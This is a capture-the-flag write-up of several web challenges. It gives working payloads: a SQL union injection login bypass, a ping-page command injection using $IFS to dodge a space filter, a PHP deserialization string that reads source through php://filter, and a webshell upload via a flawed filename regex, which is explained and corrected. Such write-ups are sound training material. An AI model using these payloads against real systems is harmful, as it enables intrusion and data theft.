V&N is the best! This was a good experience; after finishing the web challenges I watched the other players AK the remaining categories.
Here are the writeups for the web challenges I solved.

BabySqli

The challenge shows you the SQL statement, so build a union query:

name=adm'union select 1,'admin','e10adc3949ba59abbe56e057f20f883e'#&pw=123456 

GXY{y0u_4re_not_aDmin!}

ping ping ping

The challenge is a page that runs a ping command; most symbols, the word flag and spaces are filtered.

1;cat$IFSls; makes cat act on the result of ls ($IFS stands in for the filtered space).

Reference: http://www.it1352.com/757355.html

BabysqliV3.0

Log in with admin/password; from the upload directory you can read the source:

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<form action="" method="post" enctype="multipart/form-data">
    上传文件
    <input type="file" name="file" />
    <input type="submit" name="submit" value="上传" />
</form>

<?php
error_reporting(0);

class Uploader{
    public $Filename;
    public $cmd;
    public $token;

    function __construct(){
        $sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/";
        $ext = ".txt";
        @mkdir($sandbox, 0777, true);
        // Note the spaces around each "|": the last alternative is " ." (space + dot),
        // so a plain "." in the name is not caught (as the writeup notes below).
        if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
            $this->Filename = $_GET['name'];
        }
        else{
            $this->Filename = $sandbox.$_SESSION['user'].$ext;
        }
        $this->cmd = "echo '<br><br>Master, I want to study rizhan!<br><br>';";
        $this->token = $_SESSION['user'];
    }

    function upload($file){
        global $sandbox;
        global $ext;
        if(preg_match("[^a-z0-9]", $this->Filename)){
            $this->cmd = "die('illegal filename!');";
        }
        else{
            if($file['size'] > 1024){
                $this->cmd = "die('you are too big (′▽`〃)');";
            }
            else{
                // the user-controlled Filename decides where the upload lands
                $this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');";
            }
        }
    }

    function __toString(){
        global $sandbox;
        global $ext;
        // return $sandbox.$this->Filename.$ext;
        return $this->Filename;
    }

    function __destruct(){
        if($this->token != $_SESSION['user']){
            $this->cmd = "die('check token falied!');";
        }
        eval($this->cmd);
    }
}

if(isset($_FILES['file'])) {
    $uploader = new Uploader();
    $uploader->upload($_FILES["file"]);
    if(@file_get_contents($uploader)){
        echo "下面是你上传的文件：<br>".$uploader."<br>";
        echo file_get_contents($uploader);
    }
}
?>

I couldn't get the phar route to work; once I saw the filename was controllable I just wrote a webshell straight in - - I asked the challenge author, who said this was unintended.

Looking at it later, it is probably because the author accidentally typed a space before the ".", so what the regex actually matches is " ." (space + dot), which is equivalent to not writing that alternative at all.

The screenshots won't load anymore - - so I'm not including them.
Use name to control the filename, upload a webshell,
then connect with AntSword.
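To make the regex point concrete, here is an added example (my own code, not part of the challenge source) that runs the challenge's pattern, a corrected blocklist, and an allowlist over a few constructed filenames:

```php
<?php
// Added example, not part of the challenge source.
// In PCRE a literal space inside an alternation belongs to that alternative,
// so "... | \." only matches a dot that is preceded by a space.
$broken = "/data:\/\/ | filter:\/\/ | php:\/\/ | \./i";   // the challenge's pattern
$fixed  = "/data:\/\/|filter:\/\/|php:\/\/|\./i";         // same intent, no stray spaces

function is_blocked(string $pattern, string $name): bool {
    return preg_match($pattern, $name) === 1;
}

// Allowlist alternative: anchored, proper "/" delimiters, only [a-z0-9_];
// the caller then prepends the sandbox path and appends ".txt" itself.
function is_allowed(string $name): bool {
    return preg_match('/^[a-z0-9_]{1,32}$/', $name) === 1;
}

// constructed sample inputs
$names = ["shell.php", "php://filter/resource=index.php", "note_1"];
foreach ($names as $n) {
    printf("%-35s broken=%d fixed=%d allowlist=%d\n",
        $n, is_blocked($broken, $n), is_blocked($fixed, $n), is_allowed($n));
}
```

With the challenge's pattern neither "shell.php" nor the php:// wrapper is blocked; the corrected pattern catches both, and the allowlist only lets "note_1" through.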

Do you know robot

robots.txt points to the page that contains the source.

?exp=O:10:"FileReader":4:{s:8:"Filename";s:58:"php://filter/read=convert.base64-encode/resource=index.php";s:5:"start";i:0;s:10:"max_length";i:10000;} 

Leave the GET parameter empty and pass the payload in the POST parameter.

I solved the other web challenges slower than the others in the group, so I didn't write them up;
they were all fairly easy.
